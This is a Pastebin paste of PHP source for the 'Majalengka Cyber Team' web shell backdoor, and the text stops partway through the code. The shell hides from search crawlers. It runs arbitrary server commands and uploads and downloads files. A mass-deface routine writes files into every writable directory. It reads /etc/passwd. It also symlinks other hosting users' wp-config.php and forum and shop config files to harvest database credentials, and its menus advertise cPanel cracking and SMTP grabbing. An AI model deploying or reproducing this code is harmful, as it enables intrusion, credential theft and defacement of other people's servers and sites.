kangindex666

mentahan

Jan 16th, 2018
357
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 176.99 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "755596d6d2855c6b49527891bca4f7c7"; // default: dicobadulu74
  14. $color = "#00FFFF";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <link rel="icon" href="https://higherdensity.files.wordpress.com/2016/05/cobra-portal.gif type="image/x-icon"/>
  31. <title>Majalengka Cyber Team Shell</title>
  32. <center><img src="http://www.nexlen.com/img/cyber-security.png" width="400">
  33. <style type="text/css">
  34. html{
  35. background: url(https://media.giphy.com/media/xUPGcnRH3DNfyUXWqA/source.gif) no-repeat center center fixed;
  36. -webkit-background-size: cover;
  37. -moz-background-size: cover;
  38. -o-background-size: cover;
  39. background-size: cover;
  40. }
  41. header {
  42. color: cyan;
  43. margin: 10px auto;
  44. }
  45. input[type=text], input[type=password],input[type=submit] {
  46. background: transparent;
  47. color: #ffffff;
  48. border: 1px solid lime;
  49. margin: 5px auto;
  50. padding-left: 5px;
  51. font-family: 'Ubuntu';
  52. font-size: 13px;
  53. }
  54. </style>
  55. </head>
  56. <script language='javascript'>
  57. if (document.all||document.getElementById){
  58. var thetitle=document.title
  59. document.title=''
  60. }
  61. var data="@#$%&-+()*!?";
  62. var done=1;
  63. function statusIn(text){
  64. decrypt(text,5,50);
  65. }
  66. function statusOut(){
  67. self.status='';
  68. done=1;
  69. }
  70. function decrypt(text, max, delay){
  71. if (done){
  72. done = 0;
  73. rantit(text, max, delay, 0, max);
  74. }
  75. }
  76. function rantit(text, runs_left, delay, charvar, max){
  77. if (!done){
  78. runs_left = runs_left - 1;
  79. var status = text.substring(0,charvar);
  80. for(var current_char = charvar; current_char < text.length; current_char++){
  81. status += data.charAt(Math.round(Math.random()*data.length));
  82. }
  83. document.title = status;
  84. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  85. var new_char = charvar + 1;
  86. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  87. if(runs_left > 0){
  88. setTimeout(rerun, delay);
  89. }
  90. else{
  91. if (charvar < text.length){
  92. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  93. }
  94. else
  95. {
  96. done = 1;
  97. }
  98. }
  99. }
  100. }
  101. if (document.all||document.getElementById)
  102. statusIn(thetitle)
  103. </script>
  104. <center>
  105. <div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>
  106. <div class='tatsumi' border='0' cellpadding='3' cellspacing='1' align='center'>
  107. <font face="Chiller" size="7" color="white">>>> Majalengka Cyber Team <<<<br><br>
  108. <form method="post">
  109. <input type="password" name="pass"><input type='submit' value='SUBMIT' name='SUBMIT'>
  110. </form>
  111. <?php
  112. exit;
  113. }
  114. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  115. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  116. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  117. else
  118. login_shell();
  119. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  120. @ob_clean();
  121. $file = $_GET['file'];
  122. header('Content-Description: File Transfer');
  123. header('Content-Type: application/octet-stream');
  124. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  125. header('Expires: 0');
  126. header('Cache-Control: must-revalidate');
  127. header('Pragma: public');
  128. header('Content-Length: ' . filesize($file));
  129. readfile($file);
  130. exit;
  131. }
  132. ?>
  133. <html>
  134. <head>
  135. <link rel="icon" href="https://vignette.wikia.nocookie.net/vampirewars/images/e/e5/Skeletal_Ghost.png/revision/latest?cb=20111009191857" type="image/x-icon"/>
  136. <title>MAJALENGKAHACKER Shell</title>
  137. <meta name='author' content='Majalengka Cyber Team'>
  138. <meta charset="UTF-8">
  139. <style type='text/css'>
  140. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  141. html {
  142. background: black;
  143. color: red;
  144. font-family: 'Ubuntu';
  145. font-size: 20px;
  146. width: 100%;
  147. }
  148. li {
  149. display: inline;
  150. color: red;
  151. margin: 5px;
  152. padding: 5px;
  153. }
  154. table, th, td {
  155. border-collapse:collapse;
  156. font-family: Tahoma, Geneva, sans-serif;
  157. background: transparent;
  158. font-family: 'Ubuntu';
  159. font-size: 13px;
  160. }
  161. .table_home, .th_home, .td_home {
  162. border: 1px solid lime;
  163. }
  164. .table_home td:hover {
  165. background: #635F5F;
  166. }
  167. th {
  168. padding: 10px;
  169. border-color: #BDBDBD;
  170. }
  171. a {
  172. color: #ffffff;
  173. text-decoration: none;
  174. }
  175. a:hover {
  176. color: cyan;
  177. text-decoration: underline;
  178. }
  179. b {
  180. color: gold;
  181. }
  182. input[type=text], input[type=password],input[type=submit] {
  183. background: transparent;
  184. color: #ffffff;
  185. border: 1px solid lime;
  186. margin: 5px auto;
  187. padding-left: 5px;
  188. font-family: 'Ubuntu';
  189. font-size: 13px;
  190. }
  191. textarea {
  192. border: 1px solid lime;
  193. width: 100%;
  194. height: 400px;
  195. padding-left: 5px;
  196. margin: 10px auto;
  197. resize: none;
  198. background: transparent;
  199. color: red;
  200. font-family: 'Ubuntu';
  201. font-size: 13px;
  202. }
  203. select {
  204. width: 152px;
  205. background: #000000;
  206. color: cyan;
  207. border: 1px solid lime;
  208. margin: 5px auto;
  209. padding-left: 5px;
  210. font-family: 'Ubuntu';
  211. font-size: 13px;
  212. }
  213. option:hover {
  214. background: cyan;
  215. color: #000000;
  216. }
  217. .muter {
  218. onmousedown:stop;
  219. animation-name: rotate ;
  220. animation-duration: 5s;
  221. animation-play-state: running;
  222. animation-timing-function: linear;
  223. animation-iteration-count: infinite;
  224. opacity: 1.0;filter: alpha(opacity=50);}
  225.  
  226. .muter:hover {opacity: 1.0;filter: alpha(opacity=100);}
  227.  
  228. @keyframes rotate{
  229. 10% {transform:rotateY(36deg)}
  230. 20% {transform:rotateY(72deg)}
  231. 30% {transform:rotateY(108deg)}
  232. 40% {transform:rotateY(144deg)}
  233. 50% {transform:rotateY(180deg)}
  234. 60% {transform:rotateY(216deg)}
  235. 70% {transform:rotateY(252deg)}
  236. 80% {transform:rotateY(288deg)}
  237. 90% {transform:rotateY(324deg)}
  238. 100% {transform:rotateY(360deg)}
  239. }
  240. .phpinfo table{width:100%;padding:0 0 0 0;}
  241. .phpinfo td{background:black;color:lime;padding:6px 8px;;}
  242. .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;}
  243. .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
  244. .human{
  245. border:2px solid lime;
  246. }
  247. .tersakiti{
  248. border:2px solid lime;
  249. background: lime;
  250. }
  251. </style>
  252. </head>
  253. <script language='javascript'>
  254. if (document.all||document.getElementById){
  255. var thetitle=document.title
  256. document.title=''
  257. }
  258. var data="@#$%&-+()*!?";
  259. var done=1;
  260. function statusIn(text){
  261. decrypt(text,5,50);
  262. }
  263. function statusOut(){
  264. self.status='';
  265. done=1;
  266. }
  267. function decrypt(text, max, delay){
  268. if (done){
  269. done = 0;
  270. rantit(text, max, delay, 0, max);
  271. }
  272. }
  273. function rantit(text, runs_left, delay, charvar, max){
  274. if (!done){
  275. runs_left = runs_left - 1;
  276. var status = text.substring(0,charvar);
  277. for(var current_char = charvar; current_char < text.length; current_char++){
  278. status += data.charAt(Math.round(Math.random()*data.length));
  279. }
  280. document.title = status;
  281. var rerun = "rantit('" + text + "'," + runs_left + "," + delay + "," + charvar + "," + max + ");"
  282. var new_char = charvar + 1;
  283. var next_char = "rantit('" + text + "'," + max + "," + delay + "," + new_char + "," + max + ");"
  284. if(runs_left > 0){
  285. setTimeout(rerun, delay);
  286. }
  287. else{
  288. if (charvar < text.length){
  289. setTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));
  290. }
  291. else
  292. {
  293. done = 1;
  294. }
  295. }
  296. }
  297. }
  298. if (document.all||document.getElementById)
  299. statusIn(thetitle)
  300. </script>
  301. <?php
  302. ###############################################################################
  303. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  304. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  305. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
  306. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  307. // Greetz: All Member IndoXploit. & all my friends.
  308. ###############################################################################
  309. function w($dir,$perm) {
  310. if(!is_writable($dir)) {
  311. return "<font color=red>".$perm."</font>";
  312. } else {
  313. return "<font color=cyan>".$perm."</font>";
  314. }
  315. }
  316. function r($dir,$perm) {
  317. if(!is_readable($dir)) {
  318. return "<font color=red>".$perm."</font>";
  319. } else {
  320. return "<font color=cyan>".$perm."</font>";
  321. }
  322. }
  323. function exe($cmd) {
  324. if(function_exists('system')) {
  325. @ob_start();
  326. @system($cmd);
  327. $buff = @ob_get_contents();
  328. @ob_end_clean();
  329. return $buff;
  330. } elseif(function_exists('exec')) {
  331. @exec($cmd,$results);
  332. $buff = "";
  333. foreach($results as $result) {
  334. $buff .= $result;
  335. } return $buff;
  336. } elseif(function_exists('passthru')) {
  337. @ob_start();
  338. @passthru($cmd);
  339. $buff = @ob_get_contents();
  340. @ob_end_clean();
  341. return $buff;
  342. } elseif(function_exists('shell_exec')) {
  343. $buff = @shell_exec($cmd);
  344. return $buff;
  345. }
  346. }
  347. function perms($file){
  348. $perms = fileperms($file);
  349. if (($perms & 0xC000) == 0xC000) {
  350. // Socket
  351. $info = 's';
  352. } elseif (($perms & 0xA000) == 0xA000) {
  353. // Symbolic Link
  354. $info = 'l';
  355. } elseif (($perms & 0x8000) == 0x8000) {
  356. // Regular
  357. $info = '-';
  358. } elseif (($perms & 0x6000) == 0x6000) {
  359. // Block special
  360. $info = 'b';
  361. } elseif (($perms & 0x4000) == 0x4000) {
  362. // Directory
  363. $info = 'd';
  364. } elseif (($perms & 0x2000) == 0x2000) {
  365. // Character special
  366. $info = 'c';
  367. } elseif (($perms & 0x1000) == 0x1000) {
  368. // FIFO pipe
  369. $info = 'p';
  370. } else {
  371. // Unknown
  372. $info = 'u';
  373. }
  374. // Owner
  375. $info .= (($perms & 0x0100) ? 'r' : '-');
  376. $info .= (($perms & 0x0080) ? 'w' : '-');
  377. $info .= (($perms & 0x0040) ?
  378. (($perms & 0x0800) ? 's' : 'x' ) :
  379. (($perms & 0x0800) ? 'S' : '-'));
  380. // Group
  381. $info .= (($perms & 0x0020) ? 'r' : '-');
  382. $info .= (($perms & 0x0010) ? 'w' : '-');
  383. $info .= (($perms & 0x0008) ?
  384. (($perms & 0x0400) ? 's' : 'x' ) :
  385. (($perms & 0x0400) ? 'S' : '-'));
  386. // World
  387. $info .= (($perms & 0x0004) ? 'r' : '-');
  388. $info .= (($perms & 0x0002) ? 'w' : '-');
  389. $info .= (($perms & 0x0001) ?
  390. (($perms & 0x0200) ? 't' : 'x' ) :
  391. (($perms & 0x0200) ? 'T' : '-'));
  392. return $info;
  393. }
  394. function hdd($s) {
  395. if($s >= 1073741824)
  396. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  397. elseif($s >= 1048576)
  398. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  399. elseif($s >= 1024)
  400. return sprintf('%1.2f',$s / 1024 ) .' KB';
  401. else
  402. return $s .' B';
  403. }
  404. function ambilKata($param, $kata1, $kata2){
  405. if(strpos($param, $kata1) === FALSE) return FALSE;
  406. if(strpos($param, $kata2) === FALSE) return FALSE;
  407. $start = strpos($param, $kata1) + strlen($kata1);
  408. $end = strpos($param, $kata2, $start);
  409. $return = substr($param, $start, $end - $start);
  410. return $return;
  411. }
  412. function getsource($url) {
  413. $curl = curl_init($url);
  414. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  415. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  416. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  417. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  418. $content = curl_exec($curl);
  419. curl_close($curl);
  420. return $content;
  421. }
  422. function bing($dork) {
  423. $npage = 1;
  424. $npages = 30000;
  425. $allLinks = array();
  426. $lll = array();
  427. while($npage <= $npages) {
  428. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  429. if($x) {
  430. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  431. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  432. $npage = $npage + 10;
  433. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  434. } else break;
  435. }
  436. $URLs = array();
  437. foreach($allLinks as $url){
  438. $exp = explode("/", $url);
  439. $URLs[] = $exp[2];
  440. }
  441. $array = array_filter($URLs);
  442. $array = array_unique($array);
  443. $sss = count(array_unique($array));
  444. foreach($array as $domain) {
  445. echo $domain."\n";
  446. }
  447. }
  448. function reverse($url) {
  449. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  450. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  451. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  452. curl_setopt($ch, CURLOPT_HEADER, 0);
  453. curl_setopt($ch, CURLOPT_POST, 1);
  454. $resp = curl_exec($ch);
  455. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  456. $array = explode(",,", $resp);
  457. unset($array[0]);
  458. foreach($array as $lnk) {
  459. $lnk = "http://$lnk";
  460. $lnk = str_replace(",", "", $lnk);
  461. echo $lnk."\n";
  462. ob_flush();
  463. flush();
  464. }
  465. curl_close($ch);
  466. }
  467. if(get_magic_quotes_gpc()) {
  468. function human_ss($array) {
  469. return is_array($array) ? array_map('human_ss', $array) : stripslashes($array);
  470. }
  471. $_POST = human_ss($_POST);
  472. $_COOKIE = human_ss($_COOKIE);
  473. }
  474.  
  475. if(isset($_GET['dir'])) {
  476. $dir = $_GET['dir'];
  477. chdir($dir);
  478. } else {
  479. $dir = getcwd();
  480. }
  481. $kernel = php_uname();
  482. $admin_id=$_SERVER['SERVER_ADMIN'];
  483. $software = getenv("SERVER_SOFTWARE");
  484. $d0mains = @file("/etc/named.conf");
  485. $users=@file('/etc/passwd');
  486. if($d0mains)
  487. {
  488. $count;
  489. foreach($d0mains as $d0main)
  490. {
  491. if(@ereg("zone",$d0main))
  492. {
  493. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  494. flush();
  495. if(strlen(trim($domains[1][0])) > 2)
  496. {
  497. flush();
  498. $count++;
  499. }
  500. }
  501. }
  502. }
  503. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  504. $dir = str_replace("\\","/",$dir);
  505. $scdir = explode("/", $dir);
  506. $freespace = hdd(disk_free_space("/"));
  507. $total = hdd(disk_total_space("/"));
  508. $used = $total - $freespace;
  509. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=cyan>OFF</font>";
  510. $ds = @ini_get("disable_functions");
  511. $mysql = (function_exists('mysql_connect')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  512. $curl = (function_exists('curl_version')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  513. $wget = (exe('wget --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  514. $perl = (exe('perl --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  515. $python = (exe('python --help')) ? "<font color=cyan>ON</font>" : "<font color=red>OFF</font>";
  516. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=cyan>NONE</font>";
  517. if(!function_exists('posix_getegid')) {
  518. $user = @get_current_user();
  519. $uid = @getmyuid();
  520. $gid = @getmygid();
  521. $group = "?";
  522. } else {
  523. $uid = @posix_getpwuid(posix_geteuid());
  524. $gid = @posix_getgrgid(posix_getegid());
  525. $user = $uid['name'];
  526. $uid = $uid['uid'];
  527. $group = $gid['name'];
  528. $gid = $gid['gid'];
  529. }
  530. echo "<font size=5></font>";
  531. echo "System: <font color=white>".$kernel."</font><br>";
  532. echo "User: <font color=white>".$user."</font> (".$uid.") Group: <font color=white>".$group."</font> (".$gid.")<br>";
  533. echo "Server IP: <font color=white>".$ip."</font> | Your IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
  534. echo "PHP Version : <font color=white>".phpversion()."</font> <font color='white'> on</font> <font color=white>".php_sapi_name()."</font> <font class='asu'>[<a href='?dir=$dir&do=phinfo'>PHP Info</a>]</font><br>";
  535. echo "Admin : <font color=white>".$admin_id."</font> | Websites: <font color=white>$count</font> Domains<br>";
  536. echo "HDD: <font color=white>$used</font> / <font color=white>$total</font> ( Free: <font color=white>$freespace</font> )<br>";
  537. echo "Safe Mode: <fomt color=white>$sm</font><br>";
  538. echo "MySQL: <font color=white>$mysql</font> | Perl: <font color=white>$perl</font> | Python: <font color=white>$python</font> | WGET: <font color=white>$wget</font> | CURL: <font color=white>$curl</font><br> <br>";
  539. echo "&nbsp;Current DIR: ";
  540. foreach($scdir as $c_dir => $cdir) {
  541. echo "<a href='?dir=";
  542. for($i = 0; $i <= $c_dir; $i++) {
  543. echo $scdir[$i];
  544. if($i != $c_dir) {
  545. echo "/";
  546. }
  547. }
  548. echo "'>$cdir</a>/";
  549. }
  550. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  551. echo "<br><br><br>";
  552. echo "<center>";
  553. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  554. echo "<font color=red size=5>MAJALENGKA Shell Backdoor</font><br>";
  555. echo "</div>";
  556. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  557. echo "<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'><font face='iceland'></font>";
  558. echo "<ul><font face='iceland' size='5'>";
  559. echo "<ul>";
  560. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=upload'> <font color='white'>Upload</font> </a> <font color='lime'>]</font></li>";
  561. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cmd'> <font color='white'>Command</font> </a> <font color='lime'>]</font></li>";
  562. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=mass_deface'> <font color='white'>Mass Deface</font> </a> <font color='lime'>]</font></li>";
  563. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=config'> <font color='white'>Config</font> </a> <font color='lime'>]</font></li>";
  564. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=jumping'> <font color='white'>Jumping</font> </a> <font color='lime'>]</font></li>";
  565. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=zoneh'> <font color='white'>Zone-H</font> </a> <font color='lime'>]</font><br></li>";
  566. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cpanel'> <font color='white'>CPanel Crack</font> </a> <font color='lime'>]</font></li>";
  567. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=symlink'> <font color='white'>Symlink</font> </a> <font color='lime'>]</font></li>";
  568. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=smtp'> <font color='white'>SMTP Grabber</font> </a> <font color='lime'>]</font></li>";
  569. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=cgi'> <font color='white'>CGI Telnet</font> </a> <font color='lime'>]</font></li>";
  570. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=adminer'> <font color='white'>Adminer</font> </a> <font color='lime'>]</font></li>";
  571. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=csrf'> <font color='white'>CSRF</font> </a> <font color='lime'>]</font><br></li>";
  572. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=videosex'> <font color='white'>Streaming Bokep</font> </a> <font color='lime'>]</font></li>";
  573. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=auto_edit_user'> <font color='white'>Auto Edit User</font> </a> <font color='lime'>]</font></li>";
  574. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=adw'> <font color='white'>Auto Deface Wordpress</font> </a> <font color='lime'>]</font></li>";
  575. echo "<li><font color='lime'>[</font> <a href='?dir=$dir&do=aetw'> <font color='white'>Auto Edit Title Wordpress</font> </a> <font color='lime'>]</font><br></li>";
  576. echo "<li><font color='lime'>[</font> <a style='color: red;' href='?logout=true'> <font color='red'>Logout</font> </a> <font color='lime'>]</font></li>";
  577. echo "</ul>";
  578. echo "</center>";
  579. if($_GET['logout'] == true) {
  580. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  581. echo "<script>window.location='?';</script>";
  582. } elseif($_GET['do'] == 'upload') {
  583. echo "<center>";
  584. if($_POST['upload']) {
  585. if($_POST['tipe_upload'] == 'biasa') {
  586. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  587. $act = "<font color=cyan>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  588. } else {
  589. $act = "<font color=red>failed to upload file</font>";
  590. }
  591. } else {
  592. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  593. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  594. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  595. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  596. $act = "<font color=cyan>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  597. } else {
  598. $act = "<font color=red>failed to upload file</font>";
  599. }
  600. } else {
  601. $act = "<font color=red>failed to upload file</font>";
  602. }
  603. }
  604. }
  605. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'> [+] Upload Files [+]</div>";
  606. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  607. echo "<form method='post' enctype='multipart/form-data'>
  608. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  609. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  610. <input type='file' name='ix_file'>
  611. <input type='submit' value='upload' name='upload'>
  612. </form>";
  613. echo $act;
  614. echo "</div>";
  615. } elseif($_GET['do'] == 'cmd') {
  616. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Command [+]</div>";
  617. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  618. echo "<form method='post'>
  619. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  620. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  621. </form>";
  622. echo "</div>";
  623. if($_POST['do_cmd']) {
  624. echo "<pre>".exe($_POST['cmd'])."</pre>";
  625. }
  626. } elseif($_GET['do'] == 'mass_deface') {
  627. function sabun_massal($dir,$namafile,$isi_script) {
  628. if(is_writable($dir)) {
  629. $dira = scandir($dir);
  630. foreach($dira as $dirb) {
  631. $dirc = "$dir/$dirb";
  632. $lokasi = $dirc.'/'.$namafile;
  633. if($dirb === '.') {
  634. file_put_contents($lokasi, $isi_script);
  635. } elseif($dirb === '..') {
  636. file_put_contents($lokasi, $isi_script);
  637. } else {
  638. if(is_dir($dirc)) {
  639. if(is_writable($dirc)) {
  640. echo "[<font color=cyan>DONE</font>] $lokasi<br>";
  641. file_put_contents($lokasi, $isi_script);
  642. $human = sabun_massal($dirc,$namafile,$isi_script);
  643. }
  644. }
  645. }
  646. }
  647. }
  648. }
  649. function sabun_biasa($dir,$namafile,$isi_script) {
  650. if(is_writable($dir)) {
  651. $dira = scandir($dir);
  652. foreach($dira as $dirb) {
  653. $dirc = "$dir/$dirb";
  654. $lokasi = $dirc.'/'.$namafile;
  655. if($dirb === '.') {
  656. file_put_contents($lokasi, $isi_script);
  657. } elseif($dirb === '..') {
  658. file_put_contents($lokasi, $isi_script);
  659. } else {
  660. if(is_dir($dirc)) {
  661. if(is_writable($dirc)) {
  662. echo "[<font color=cyan>DONE</font>] $dirb/$namafile<br>";
  663. file_put_contents($lokasi, $isi_script);
  664. }
  665. }
  666. }
  667. }
  668. }
  669. }
  670. if($_POST['start']) {
  671. if($_POST['tipe_sabun'] == 'mahal') {
  672. echo "<div style='margin: 5px auto; padding: 5px'>";
  673. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  674. echo "</div>";
  675. } elseif($_POST['tipe_sabun'] == 'murah') {
  676. echo "<div style='margin: 5px auto; padding: 5px'>";
  677. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  678. echo "</div>";
  679. }
  680. } else {
  681. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Mass Deface [+]</div>";
  682. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  683. echo "<center>";
  684. echo "<form method='post'>
  685. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  686. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  687. <font style='text-decoration: underline;'>Folder:</font><br>
  688. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  689. <font style='text-decoration: underline;'>Filename:</font><br>
  690. <input type='text' name='d_file' value='majalengka.php' style='width: 450px;' height='10'><br>
  691. <font style='text-decoration: underline;'>majalengka File:</font><br>
  692. <textarea name='script' style='width: 450px; height: 200px;'>Created by Majalengka Cyber Team</textarea><br>
  693. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  694. </form></center>";
  695. }
  696. }
  697. elseif($_GET['do'] == 'symconfig') {
  698. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  699. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  700. exit;
  701. }
  702. else
  703. {
  704. if($_POST["m"] && !$_POST["passwd"]==""){
  705. @mkdir("Mct_symconf", 0777);
  706. @chdir("tatsumi_symconf");
  707. @symlink("/","root");
  708. $htaccess="Options Indexes FollowSymLinks
  709. DirectoryIndex z.htm
  710. AddType text/plain .php
  711. AddHandler text/plain .php
  712. Satisfy Any";
  713. @file_put_contents(".htaccess",$htaccess);
  714. $etc_passwd=$_POST["passwd"];
  715. $etc_passwd=explode("\n",$etc_passwd);
  716. foreach($etc_passwd as $passwd){
  717. $pawd=explode(":",$passwd);
  718. $user =$pawd[0];
  719.  
  720. @symlink('/','mct_symconf/root');
  721. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  722. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  723. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  724. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  725. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  726. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  727. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  728. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  729. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  730. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  731. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  732. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  733. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  734. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  735. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  736. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  737. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  738. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  739. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  740. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  741. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
